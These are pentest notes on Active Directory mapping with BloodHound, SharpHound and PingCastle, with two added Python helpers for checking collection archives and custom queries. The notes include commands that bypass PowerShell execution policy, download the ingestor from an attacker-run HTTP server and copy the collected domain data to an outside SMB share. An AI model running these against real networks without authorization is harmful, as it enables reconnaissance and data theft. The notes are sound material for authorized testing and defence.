Domain Mapping

BloodHound

Tips

# Right Click
# Get information about the node and also how to compromise the user / machine

# Owned
# Can be useful during an internal pentest to note where you are
# Nodes will be tagged with a skull
# It's then possible to ask the shortest path to a node from the owned ones

# Filters
# Can be useful

# Shortcuts
# CTRL --> Change node display
# CTRL+SHIFT+I --> Developer Tools
# CTRL+R --> Reload display

# Still possible to edit data to set what you want
# If you don't have access to a domain machine but have creds
# You can run from host
runas /netonly /user:FQDN.local\USER powershell
# Then
Import-Module Sharphound.ps1
Invoke-BloodHound -ZipFileName 'PATH/TO/ZIP.zip' -JsonFolder 'PATH/TO/folder' -CollectionMethod All -Domain FQDN

Setup

# BloodHound directly from the target machine
# apt-get install bloodhound

# Setup
$ sudo neo4j console
...
... http://localhost:7474
user/pass = neo4j/neo4j

# Start
$ bloodhound
URL : bolt://127.0.0.1:7687

Target Collection

# On the target, drop the Sharphound ingestor
# You can drop it through shared folder or by download
https://github.com/BloodHoundAD/BloodHound
https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1

# Powershell
Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All

# Default : Domains, Computers, Users, Groups
# All : Domains, Computers, Users, Groups, OUs, GPOs

# Exe
# You may need some .NET packages
C:\> SharpHound.exe
C:\> SharpHound.exe --CollectionMethod SessionLoop --MaxLoopTime 1h
C:\> SharpHound.exe --CollectionMethod ACL

.\SharpHound.exe --domain UCA.LAN --domaincontroller 192.168.30.10 --ldapusername "die-hardman" --ldappassword "maskonyourface" --CollectionMethod Group,LocalGroup,GPOLocalGroup,Session,LoggedOn,ObjectProps,ACL,ComputerOnly,Trusts,Default,RDP,DCOM,DCOnly

# Python based ingestor (for remote work)
https://github.com/fox-it/BloodHound.py

# Collection Methods : Default, Group, LocalAdmin, RDP, DCOM, Session, Acl, Trusts, LoggedOn, ObjectProps, All (except LoggedOn)
bloodhound-python -u USERNAME -p PASSWORD -d DOMAIN --collectionmethod All
# Drop BloodHound ingestor and get results back through SMB Server
python -m SimpleHTTPServer
Invoke-WebRequest -Uri "http://10.10.16.112:8000/SharpHound.ps1" -OutFile ".\SharpHound.ps1"

Powershell.exe -Exec Bypass
Import-Module .\Sharphound.ps1
Invoke-Bloodhound
Invoke-BloodHound -CollectionMethod All

# Since Windows 10 you can't use an anonymous SMB server anymore (guest access is blocked), so set a user/password
sudo python smbserver.py SDFR /BloodHound/Ingestors -smb2support -username "peon" -password "peon"

net use Z: \\192.168.30.130\SDFR /user:peon peon
net use Z: /delete /y

copy C:\Users\xxx\Documents\20191104044628_BloodHound.zip \\10.10.16.112\TESTLOL\file.zip

Analysis

# Results will be zipped
# Get back zip, unzip it and upload files into bloodhound
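Added example (not from the original notes): before uploading a SharpHound archive, it helps to check what is actually inside it, because a collection that silently lacked rights for some method (no sessions, no ACLs, ...) just produces a smaller zip. The layout assumed here is the one SharpHound writes, one JSON file per object type with a `data` list and a `meta` block carrying `type` and `count`; the archive below is constructed in memory for illustration and is not real collection output.

```python
import io
import json
import zipfile

# Constructed sample in the assumed SharpHound layout ("data" list + "meta" block).
# Names, SIDs and counts are invented for this example.
SAMPLE_FILES = {
    "20191104044628_users.json": {
        "data": [
            {"ObjectIdentifier": "S-1-5-21-1-2-3-1105",
             "Properties": {"name": "ALICE@FQDN.LOCAL", "enabled": True}},
            {"ObjectIdentifier": "S-1-5-21-1-2-3-1106",
             "Properties": {"name": "BOB@FQDN.LOCAL", "enabled": False}},
        ],
        "meta": {"type": "users", "count": 2, "version": 3},
    },
    "20191104044628_computers.json": {
        "data": [
            {"ObjectIdentifier": "S-1-5-21-1-2-3-1000",
             "Properties": {"name": "DC01.FQDN.LOCAL", "enabled": True}},
        ],
        "meta": {"type": "computers", "count": 1, "version": 3},
    },
    "readme.txt": "not a collection file",
}


def build_sample_zip():
    """Build the constructed archive in memory so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in SAMPLE_FILES.items():
            payload = content if isinstance(content, str) else json.dumps(content)
            zf.writestr(name, payload)
    return buf.getvalue()


def summarize_archive(zip_bytes):
    """Return {object_type: {"file", "count", "declared", "mismatch"}} for every
    JSON file in the archive. A mismatch between meta.count and len(data) points
    at a truncated or edited file, which should not be uploaded as-is."""
    summary = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".json"):
                continue
            try:
                # utf-8-sig strips a BOM if the ingestor wrote one
                doc = json.loads(zf.read(info).decode("utf-8-sig"))
            except (ValueError, UnicodeDecodeError):
                summary[info.filename] = {"error": "not valid JSON"}
                continue
            data = doc.get("data", [])
            meta = doc.get("meta", {})
            # Fall back to the filename suffix (xxx_users.json -> users) when meta.type is absent
            obj_type = meta.get("type") or info.filename.rsplit("_", 1)[-1][:-5]
            declared = meta.get("count", len(data))
            summary[obj_type] = {
                "file": info.filename,
                "count": len(data),
                "declared": declared,
                "mismatch": declared != len(data),
            }
    return summary


def missing_types(summary, expected=("users", "computers", "groups", "domains")):
    """Object types you expected from the chosen collection method but did not get."""
    return [t for t in expected if t not in summary]


if __name__ == "__main__":
    import sys
    # Pass a real archive path to inspect it; otherwise the constructed sample is used
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_zip()
    result = summarize_archive(blob)
    for obj_type, entry in result.items():
        print(obj_type, entry)
    print("missing:", missing_types(result))
```

Run it against the zip you copied back (`python check_zip.py 20191104044628_BloodHound.zip`); an empty `missing` list and no `mismatch` flags means the upload will populate what you expect. The expected type list is only the Default set; extend it with `sessions`, `gpos`, `ous` when you ran `-CollectionMethod All`.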
# Custom queries
https://github.com/hausec/Bloodhound-Custom-Queries

# Replace or update the following file
C:\Users\[USERNAME]\AppData\Roaming\BloodHound\customqueries.json
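Added example (not from the original notes or the hausec repo): updating customqueries.json by hand tends to either clobber the queries already there or leave a duplicate name. The script below merges new entries into the existing file, replacing an entry with the same name rather than duplicating it, and rejects entries BloodHound would not load. The file layout assumed is the legacy BloodHound one (top-level `queries` list; each entry has `name`, optional `category`, and a `queryList` of `{final, query, allowCollapse}` steps). The example query is a hygiene check built from properties SharpHound collects with ObjectProps (`enabled`, `pwdneverexpires`) and the `highvalue` flag BloodHound sets on privileged groups; the `APPDATA` lookup is an assumption for locating the file.

```python
import json
import os
import sys
from pathlib import Path

# Constructed entry in the assumed customqueries.json layout: enabled users whose
# password never expires and who are (directly or via nesting) members of a
# group BloodHound marks as high value.
NEW_QUERIES = [
    {
        "name": "Enabled users with non-expiring passwords in high value groups",
        "category": "Hygiene",
        "queryList": [
            {
                "final": True,
                "query": (
                    "MATCH p=(u:User {enabled:true, pwdneverexpires:true})"
                    "-[:MemberOf*1..]->(g:Group {highvalue:true}) RETURN p"
                ),
                "allowCollapse": True,
            }
        ],
    }
]


def default_path():
    # Path from the notes above; APPDATA normally resolves to C:\Users\<user>\AppData\Roaming
    return Path(os.environ.get("APPDATA", ".")) / "BloodHound" / "customqueries.json"


def load_queries(path):
    """Read the existing file, tolerating a missing or empty one (fresh install)."""
    p = Path(path)
    if not p.exists() or p.stat().st_size == 0:
        return {"queries": []}
    with p.open("r", encoding="utf-8") as fh:
        doc = json.load(fh)
    if not isinstance(doc.get("queries"), list):
        raise ValueError("customqueries.json: top-level 'queries' must be a list")
    return doc


def validate_query(entry):
    """Reject entries the BloodHound UI would not be able to run."""
    if not entry.get("name"):
        raise ValueError("query entry needs a non-empty 'name'")
    steps = entry.get("queryList")
    if not isinstance(steps, list) or not steps:
        raise ValueError(f"{entry['name']}: 'queryList' must be a non-empty list")
    for step in steps:
        if not isinstance(step.get("query"), str) or not step["query"].strip():
            raise ValueError(f"{entry['name']}: each step needs a Cypher 'query' string")
    # The last step is the one whose result gets drawn; it must be marked final
    if not steps[-1].get("final", False):
        raise ValueError(f"{entry['name']}: last queryList step must have final=true")
    return True


def merge_queries(existing, new_entries):
    """Return a new document with new_entries added. An entry whose name already
    exists replaces the old one instead of producing a duplicate menu item."""
    merged = {k: v for k, v in existing.items() if k != "queries"}
    by_name = {q["name"]: q for q in existing.get("queries", []) if "name" in q}
    for entry in new_entries:
        validate_query(entry)
        by_name[entry["name"]] = entry
    merged["queries"] = list(by_name.values())
    return merged


def update_file(path, new_entries):
    """Merge into the file on disk and return the resulting number of queries."""
    doc = merge_queries(load_queries(path), new_entries)
    Path(path).write_text(json.dumps(doc, indent=2), encoding="utf-8")
    return len(doc["queries"])


if __name__ == "__main__":
    # Dry run: print the merged document; pass --write to update the file
    target = default_path()
    if "--write" in sys.argv:
        print("queries after merge:", update_file(target, NEW_QUERIES))
    else:
        print(json.dumps(merge_queries(load_queries(target), NEW_QUERIES), indent=2))
```

Restart BloodHound (or CTRL+R) after writing the file so the Queries tab picks up the new entry; keep a copy of the original file, since a malformed JSON file makes the whole custom query list disappear from the UI.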


PingCastle

Link : https://www.pingcastle.com/PingCastleFiles/PingCastle_2.4.3.0.zip
> Drop exe on the target
> Run Pingcastle.exe (interactive mode by default)
> Healthcheck (enter) and domain (*)

> CLI mode :
> PingCastle --healthcheck --server mydomain.com
> PingCastle --carto


ADACLScanner

TODO